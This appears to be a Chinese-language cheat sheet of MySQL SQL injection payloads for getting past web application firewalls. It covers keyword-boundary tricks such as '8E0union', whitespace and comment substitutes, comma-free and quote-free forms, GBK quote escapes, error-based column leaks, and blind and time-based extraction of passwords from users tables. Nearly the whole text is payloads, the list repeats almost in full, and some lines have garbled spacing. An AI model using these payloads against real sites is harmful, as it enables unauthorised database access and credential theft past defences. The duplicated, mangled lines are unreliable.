1 直接上语法
2 select * from users where id =8E0union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
3 select * from users where id = 8.0 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
4 select * from users where id =\Nunion select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
5 因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
6 我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。
7 ==================================================
8 where id =.1 union /* .1 */ select -. 1
9 where id =.1 union /* .1 */ select!. 1
10 where id =.1 union /* .1 */ select ~. 1
11 where id =.1 union /* .1 */ select( 1)
12 where id =.1 union /* .1 */ select`host` from mysql. user
13 where id =.1 union /* .1 */ select ' 1 '
14 where id =.1 union /* .1 */ select" 1"
15 where id =.1 union /* .1 */ select @1
16 ================================================
17 mysql研究方向.txt
18 Mysql:
19 空格,且与符号( and or),单引号,逗号",",双引号",截断符号如:(# -- /*)
20
21 空格:
22 select * from( user);
23 select * from` user`;
24 ' and(true)like(false)union(select(pass)from(users))#
25 ' union [ all|distinct ] select pass from users#
26 09 Horizontal Tab
27 0A New Line
28 0B Vertical Tab
29 0C New Page
30 0D Carriage Return
31 A0 Non -breaking Space
32 20 Space
33
34 且与符号( and or):
35 select * from user where host = ' localhost ' && 0 = 0 limit 0, 1;
36 select * from user where host = ' localhost ' || 1 = 1 limit 0, 1;
37
38 20 Space
39 2B +
40 2D -
41 7E ~
42 21 !
43 40 @
44 Example:
45 SELECT 1 FROM dual WHERE 1 = 1 AND-+-+-+-+~~(( 1))
46
47 ● Prefixes (combine arbitrarily 任意组合 单目运算符): + - ~ !
48 ' or --+2=- -!!! ' 2
49 ● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>,
50 XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
51 ' or 1
52 单引号:
53 ' -GBK编码 %df ' ; ' -% 2527 UNICODE编码
54
55
56 逗号:
57 UNION SELECT * FROM (( SELECT 1)a JOIN ( SELECT 2)b JOIN ( SELECT 3)c)
58 //利用MySQL出错爆出字段
59 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B) C;
60 ERROR 1060 (42S21): Duplicate column name 'Host '
61 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host)) C;
62 ERROR 1060 (42S21): Duplicate column name ' User '
63 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host, User)) C;
64 ERROR 1060 (42S21): Duplicate column name 'Password '
65
66 双引号:
67 类同单引号的思路
68
69 编码:
70 ' or 'a ' = n 'a # unicode
71 ' or 'a ' = b ' 1100001 # binary
72 ' or 'a ' = x ' 61 # hexadecimal
73 ' and substr(data,1,1) = 0x61# 0x6162
74 ' and substr(data, 1, 1) = unhex( 61)# unhex( 6162)
75 ' and substr(data,1,1) = char(97)# char(97,98)
76 String builder (3)
77 ● Previous functions are well known
78 ● My favourite:
79 ' and substr(data, 1, 1) = lower(conv( 10, 10, 36))# ' a '
80 ' and substr(data,1,1) = lower(conv(11,10,36))# 'b '
81 ' and substr(data, 1, 1) = lower(conv( 36, 10, 36))# ' z '
82
83
84 截断符号:
85 常见的:# -- /*
86 -- - SQL comment
87 ; % 00 Nullbyte
88 ` Backtick
89
90
91 盲注:
92 AND MID(VERSION(), 1, 1) = ' 5 '
93 AND SELECT SUBSTR(column_name, 1, 1) FROM information_schema.columns > ' A '
94 ' and substr(data,1,1) = 'a ' #
95 ' and substring(data, 1, 1) = ' a '#
96 ' and mid(data,1,1) = 'a ' #
97 ● All 3 functions work without comma(逗号) too:
98 ' and substr(data from 1 for 1) = ' a '#
99 lpad(data, 1, space( 1)) // lpad( ' hi ', 4, ' ? ') = ' ??hi '
100 rpad(data, 1, space( 1)) // rpad( ' hi ', 4, ' ? ') = ' hi?? '
101 left(data, 1)
102 reverse( right( reverse(data), 1))
103 insert( insert(version(), 1, 0, space( 0)), 2, 222, space( 0))
104 ● Subselect:
105 1 ' and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit
106 1,1)and ' 1
107
108 Some functions allow to search substrings:
109 ' -if(locate( 'f ' ,data),1,0)#
110 ' - if(locate( ' fo ',data), 1, 0)#
111 ' -if(locate( 'foo ' ,data),1,0)#
112
113 ● Some functions allow to cut substrings:
114 length(trim(leading 'a ' FROM data)) # length will be shorter
115 length(replace(data, 'a ' , '' )) # length will be shorter
116
117 Subselect:
118 foo 'div count( select`pass` from(users) where mid(pass, 1, 1)rlike
119 lower(conv( 10, pi() * pi(), pi() * pi())) ) - ' 0
120
121 Blind SQL Injection
122 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
123
124
125
126 延迟:
127 ' - ( IF(MID(version(), 1, 1) LIKE 5, BENCHMARK( 100000,SHA1( ' true ')), false)) - '
128
129
130 Nope:
131 false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20
132 true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21
133 true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22
134 floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23
135 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24
136 floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25
137 ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26
138 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27
139 floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28
140 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29
141
142
143 conv([10-36],10,36)
144 false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
145 true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
146 true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
147 floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
148 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
149 floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
150 ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
151 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
152 floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
153 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T
2 select * from users where id =8E0union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
3 select * from users where id = 8.0 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
4 select * from users where id =\Nunion select 1, 2, 3, 4, 5, 6, 7, 8, 9, 0
5 因为一般waf在防御的时候会识别union等关键词的单词边界,但是这个语句刚好可以绕过单词边界的判定。
6 我是fuzz出来的,了解了一下,大概是利用了语法分析中浮点击指数后语境结束,之后就直接执行后面的语句了。
7 ==================================================
8 where id =.1 union /* .1 */ select -. 1
9 where id =.1 union /* .1 */ select!. 1
10 where id =.1 union /* .1 */ select ~. 1
11 where id =.1 union /* .1 */ select( 1)
12 where id =.1 union /* .1 */ select`host` from mysql. user
13 where id =.1 union /* .1 */ select ' 1 '
14 where id =.1 union /* .1 */ select" 1"
15 where id =.1 union /* .1 */ select @1
16 ================================================
17 mysql研究方向.txt
18 Mysql:
19 空格,且与符号( and or),单引号,逗号",",双引号",截断符号如:(# -- /*)
20
21 空格:
22 select * from( user);
23 select * from` user`;
24 ' and(true)like(false)union(select(pass)from(users))#
25 ' union [ all|distinct ] select pass from users#
26 09 Horizontal Tab
27 0A New Line
28 0B Vertical Tab
29 0C New Page
30 0D Carriage Return
31 A0 Non -breaking Space
32 20 Space
33
34 且与符号( and or):
35 select * from user where host = ' localhost ' && 0 = 0 limit 0, 1;
36 select * from user where host = ' localhost ' || 1 = 1 limit 0, 1;
37
38 20 Space
39 2B +
40 2D -
41 7E ~
42 21 !
43 40 @
44 Example:
45 SELECT 1 FROM dual WHERE 1 = 1 AND-+-+-+-+~~(( 1))
46
47 ● Prefixes (combine arbitrarily 任意组合 单目运算符): + - ~ !
48 ' or --+2=- -!!! ' 2
49 ● Operators: ^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>,
50 XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
51 ' or 1
52 单引号:
53 ' -GBK编码 %df ' ; ' -% 2527 UNICODE编码
54
55
56 逗号:
57 UNION SELECT * FROM (( SELECT 1)a JOIN ( SELECT 2)b JOIN ( SELECT 3)c)
58 //利用MySQL出错爆出字段
59 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B) C;
60 ERROR 1060 (42S21): Duplicate column name 'Host '
61 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host)) C;
62 ERROR 1060 (42S21): Duplicate column name ' User '
63 mysql > SELECT * FROM ( SELECT * FROM user A JOIN user B USING (Host, User)) C;
64 ERROR 1060 (42S21): Duplicate column name 'Password '
65
66 双引号:
67 类同单引号的思路
68
69 编码:
70 ' or 'a ' = n 'a # unicode
71 ' or 'a ' = b ' 1100001 # binary
72 ' or 'a ' = x ' 61 # hexadecimal
73 ' and substr(data,1,1) = 0x61# 0x6162
74 ' and substr(data, 1, 1) = unhex( 61)# unhex( 6162)
75 ' and substr(data,1,1) = char(97)# char(97,98)
76 String builder (3)
77 ● Previous functions are well known
78 ● My favourite:
79 ' and substr(data, 1, 1) = lower(conv( 10, 10, 36))# ' a '
80 ' and substr(data,1,1) = lower(conv(11,10,36))# 'b '
81 ' and substr(data, 1, 1) = lower(conv( 36, 10, 36))# ' z '
82
83
84 截断符号:
85 常见的:# -- /*
86 -- - SQL comment
87 ; % 00 Nullbyte
88 ` Backtick
89
90
91 盲注:
92 AND MID(VERSION(), 1, 1) = ' 5 '
93 AND SELECT SUBSTR(column_name, 1, 1) FROM information_schema.columns > ' A '
94 ' and substr(data,1,1) = 'a ' #
95 ' and substring(data, 1, 1) = ' a '#
96 ' and mid(data,1,1) = 'a ' #
97 ● All 3 functions work without comma(逗号) too:
98 ' and substr(data from 1 for 1) = ' a '#
99 lpad(data, 1, space( 1)) // lpad( ' hi ', 4, ' ? ') = ' ??hi '
100 rpad(data, 1, space( 1)) // rpad( ' hi ', 4, ' ? ') = ' hi?? '
101 left(data, 1)
102 reverse( right( reverse(data), 1))
103 insert( insert(version(), 1, 0, space( 0)), 2, 222, space( 0))
104 ● Subselect:
105 1 ' and 0x61=(/*foo*/SELECT mid(pass,1,1) from users limit
106 1,1)and ' 1
107
108 Some functions allow to search substrings:
109 ' -if(locate( 'f ' ,data),1,0)#
110 ' - if(locate( ' fo ',data), 1, 0)#
111 ' -if(locate( 'foo ' ,data),1,0)#
112
113 ● Some functions allow to cut substrings:
114 length(trim(leading 'a ' FROM data)) # length will be shorter
115 length(replace(data, 'a ' , '' )) # length will be shorter
116
117 Subselect:
118 foo 'div count( select`pass` from(users) where mid(pass, 1, 1)rlike
119 lower(conv( 10, pi() * pi(), pi() * pi())) ) - ' 0
120
121 Blind SQL Injection
122 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))
123
124
125
126 延迟:
127 ' - ( IF(MID(version(), 1, 1) LIKE 5, BENCHMARK( 100000,SHA1( ' true ')), false)) - '
128
129
130 Nope:
131 false !pi() 0 ceil(pi()*pi()) 10 ceil((pi()+pi())*pi()) 20
132 true !!pi() 1 ceil(pi()*pi())+true 11 ceil(ceil(pi())*version()) 21
133 true+true 2 ceil(pi()+pi()+version()) 12 ceil(pi()*ceil(pi()+pi())) 22
134 floor(pi()) 3 floor(pi()*pi()+pi()) 13 ceil((pi()+ceil(pi()))*pi()) 23
135 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 ceil(pi())*ceil(version()) 24
136 floor(version()) 5 ceil(pi()*pi()+version()) 15 floor(pi()*(version()+pi())) 25
137 ceil(version()) 6 floor(pi()*version()) 16 floor(version()*version()) 26
138 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 ceil(version()*version()) 27
139 floor(version()+pi()) 8 ceil(pi()*version())+true 18 ceil(pi()*pi()*pi()-pi()) 28
140 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 floor(pi()*pi()*floor(pi())) 29
141
142
143 conv([10-36],10,36)
144 false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()+pi())*pi()) 20 K
145 true !!pi() 1 ceil(pi()*pi())+true 11 B ceil(ceil(pi())*version()) 21 L
146 true+true 2 ceil(pi()+pi()+version()) 12 C ceil(pi()*ceil(pi()+pi())) 22 M
147 floor(pi()) 3 floor(pi()*pi()+pi()) 13 D ceil((pi()+ceil(pi()))*pi()) 23 N
148 ceil(pi()) 4 ceil(pi()*pi()+pi()) 14 E ceil(pi())*ceil(version()) 24 O
149 floor(version()) 5 ceil(pi()*pi()+version()) 15 F floor(pi()*(version()+pi())) 25 P
150 ceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Q
151 ceil(pi()+pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 R
152 floor(version()+pi()) 8 ceil(pi()*version())+true 18 I ceil(pi()*pi()*pi()-pi()) 28 S
153 floor(pi()*pi()) 9 floor((pi()+pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T